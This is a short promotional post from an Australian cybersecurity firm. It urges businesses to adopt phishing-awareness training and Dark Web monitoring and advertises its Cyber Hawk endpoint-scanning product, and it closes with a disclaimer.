We’ve all heard this old saw, and it’s still popular for a reason: it’s right. Taking strong preventative measures now to protect your data saves both time and money later. More than 50% of businesses had a data breach in 2020 – and that’s a time-consuming money pit for any company. By taking the right preventative measures now, you can lower your risk of a data breach later.  One of the most important preventative measures to take right away is updated training about current phishing threats. Right now, cybercriminals are using many new tricks to mount phishing attacks. While your staff may be aware that they shouldn’t open unexpected attachments, do they know not to click surprise links, or open unanticipated PDFs, or accept unverified Zoom invitations? Updated phishing training prepares them to resist these threats and protect your data.  Coupling phishing resistance training with 24/7/365 Dark Web monitoring guards your data on two fronts. Not only are you preventing bad actors from getting a front door key to your data with improved phishing resistance, but you’re also making sure that cybercriminals aren’t sneaking in the back door either by watching for Dark Web threats. By combining multiple solutions that work together well, you can maximize the ways that your security solutions help prevent data loss – because strong, sensible preventative measures always pay off.



Many cybersecurity incidents today are the result of internal security issues that no firewall or anti-virus could have prevented.  Cyber Hawk combines machine learning and intelligent tagging to identify anomalous activity, suspicious changes, and threats caused by misconfigurations.  It is uploaded remotely on your Windows-based Endpoints (Desktops/Laptops/Tablets) and keeps you posted of any potential internal security issues going on inside your network. Set the time for the daily scan and Cyber Hawk reports back with an email alert sent to any address you specify. The daily alerts aggregate the issues that were detected during the past 24 hours and can be sorted either by priority/severity (high, medium and low) of the threat, or by the type of issue (threat, anomaly, change).




Avantia Corporate Services Pty Ltd T/A Avantia Cyber Security provides the content in this publication to the reader for general information purposes only and has compiled the content from a number of sources in Australia, the USA, other members of the 5 Eyes Alliance, the Australian Cyber Security Centers, and other sources in 56 countries who provide cyber breach and cyber security information to us in real time. Given their international focus and experience in the cyberspace arena we believe their data to be accurate and reliable, however, we give no warranty (implied or otherwise), as to the contents accuracy or fitness for use. No validation or investigation has been performed by Avantia Corporate Services or the Author as to its accuracy or reliability. Readers should conduct their own investigation and come to their own conclusions before taking any action.

*COPYRIGHT 2020* Avantia Corporate Services - All Rights Reserved.